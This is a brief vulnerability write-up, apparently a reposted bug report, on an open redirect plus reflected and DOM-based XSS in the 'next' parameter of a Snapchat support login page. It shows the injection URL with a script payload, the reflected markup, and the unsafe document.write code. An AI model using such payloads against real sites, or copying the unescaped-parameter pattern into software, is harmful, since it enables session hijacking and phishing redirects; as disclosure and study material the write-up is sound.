XSS and Open Redirect at Snapchat

Credit to @revskills for publishing this.

When you first go to the link the server sends out an location-header to the url in the get-variable named “next”. (open redirect)
The secound time this is not happening, guess it’s a cookiebased controll.

Burp: image

The get-variable “next” is also printed multiple times in plain.

https://support.snapchat.com/login?next="><script>alert(1)</script>

Now check line 63 and you will find this: <input type="hidden" name="next" value=""><script>alert(1)</script>">

Then we have this thing:

<script type="text/javascript">
skipLogin=('&skip_login=true')
document.write(
'<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="[payload]' + skipLogin + '">Skip Sign In</a></div>'
)
</script>

We can insert anything except ; there.
The easiest payload is this:

Payload: "><script>alert(1)</script>
Request: https://support.snapchat.com/login?next="><script>alert(1)</script>

<script type="text/javascript"> skipLogin=('&skip_login=true') document.write( '<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="><script>alert(1)</script>' + skipLogin + '">Skip Sign In</a></div>' ) </script>

What really happens here is the script will write it out and then execute it, so really it is kinda a DOM-XSS(even if normal XSS is probably possible if you try).

So, basically it is a DOM-XSS, an Open Redirect and a reflected XSS in the very same page.